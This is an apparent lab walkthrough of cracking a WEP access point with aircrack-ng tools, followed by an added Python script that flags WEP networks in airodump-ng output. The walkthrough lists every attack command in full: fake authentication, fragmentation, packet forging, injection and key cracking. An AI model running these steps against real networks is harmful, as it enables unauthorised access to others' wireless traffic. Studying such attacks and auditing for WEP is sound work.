WIFOO Revisited – Part 2 – WEP

Part 1

1. Create the wireless monitor interface(s).

sudo iw wlan1 interface add mon0 type monitor
sudo iw wlan1 interface add mon1 type monitor
sudo iw wlan1 interface add mon2 type monitor

2. Recon and gather info using any of the monitor mode interfaces.

sudo airodump-ng --band abg mon0

Take note of the BSSID, channel, encryption, cipher, and ESSID.

Once the BSSID/ESSID is obtained, execute a filtered capture on the target network.

sudo airodump-ng --channel 11 --bssid 20:AA:4B:4A:93:F7 -w WIFOO-ATTACK-2 mon0 --ignore-negative-one

3. Document the BSSID of the AP, the channel, and the MAC address of the monitor mode interface.

echo victim 20:AA:4B:4A:93:F7 > attackinfo
echo channel 11 >> attackinfo
echo mon0 00-C0-CA-88-8B-69 >> attackinfo

4. Initiate a “fake” authentication with the access point using aireplay-ng.

sudo aireplay-ng --fakeauth 60 -a 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one

Executing the command will cause the monitor mode interface to associate with the AP.

Inspection of the airodump-ng capture shows that the AP accepted the association.

For the WEP attack to work, the association must be valid. The previously executed command will maintain a continuous connection.


5. Execute the fragmentation attack using aireplay-ng. Reference: https://www.aircrack-ng.org/doku.php?id=fragmentation

sudo aireplay-ng --fragment -b 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one

6. Generate an ARP packet with packetforge-ng from the .xor file. The resulting file (clientlessinject) will be used to inject packets into the network.

The goal of the injection is to quickly increase the amount of data going to the AP. At this point the capture holds only 300+ data frames, which is insufficient to crack WEP.

sudo packetforge-ng -0 -a 20:AA:4B:4A:93:F7 -h 00-C0-CA-88-8B-69 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0316-175707.xor -w clientlessinject

7. Next, inject the packet into the network using aireplay-ng with the interactive option. This should cause the AP to generate weak IVs.

sudo aireplay-ng --interactive -r clientlessinject mon0

The AP should now generate large amounts of IVs which can be used to crack WEP.

8. With 10,000 IVs collected, it’s time to try cracking the key using the .cap file that is being logged. Run the crack while the injection is still running. The more frames, the better.

sudo aircrack-ng -0 WIFOO-ATTACK-2-01.cap

The key length shouldn’t matter once many IVs are collected.


Delete the monitor mode interfaces created in step 1.

sudo iw dev mon0 del
sudo iw dev mon1 del
sudo iw dev mon2 del
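The fields noted in step 2 (BSSID, channel, encryption, cipher, ESSID) are also what a site audit needs in order to find networks still running WEP. The following is an added example, not part of the original post: it parses the AP section of the CSV that airodump-ng writes next to the .cap file and lists WEP networks; the column layout is an assumption and every sample row is constructed.

```python
# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv.
# Column order is an assumption; timestamps, counters and the second AP are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
20:AA:4B:4A:93:F7, 2000-01-01 10:00:00, 2000-01-01 10:08:00, 11, 54, WEP, WEP, , -40, 120, 10342, 0. 0. 0. 0, 5, WIFOO,
02:00:00:00:00:01, 2000-01-01 10:00:02, 2000-01-01 10:08:00, 6, 130, WPA2, CCMP, PSK, -61, 98, 0, 0. 0. 0. 0, 10, Lab, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:AA, 2000-01-01 10:01:00, 2000-01-01 10:08:00, -30, 900, 20:AA:4B:4A:93:F7,
"""


def parse_aps(text):
    """Return one dict per access point from the AP section of the CSV."""
    aps = []
    for line in text.splitlines():
        if line.startswith("Station MAC"):
            break  # client section follows; only APs are audited here
        parts = line.split(",", 13)
        if len(parts) < 14 or parts[0].strip() == "BSSID":
            continue  # blank line or header row
        f = [p.strip() for p in parts[:13]]
        # An ESSID may itself contain commas, so cut it out by ID-length
        # instead of trusting the comma split.
        rest = parts[13][1:] if parts[13].startswith(" ") else parts[13]
        length = int(f[12]) if f[12].isdigit() else 0
        aps.append({
            "bssid": f[0], "channel": int(f[3]), "privacy": f[5],
            "cipher": f[6], "ivs": int(f[10]), "essid": rest[:length],
        })
    return aps


def wep_findings(text):
    """APs whose Privacy column advertises WEP, highest IV count first."""
    hits = [ap for ap in parse_aps(text) if "WEP" in ap["privacy"].split()]
    return sorted(hits, key=lambda ap: ap["ivs"], reverse=True)


if __name__ == "__main__":
    for ap in wep_findings(SAMPLE_CSV):
        print(f'{ap["essid"]} ({ap["bssid"]}) ch {ap["channel"]}: '
              f'WEP in use, {ap["ivs"]} IVs seen; migrate to WPA2/WPA3')
```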
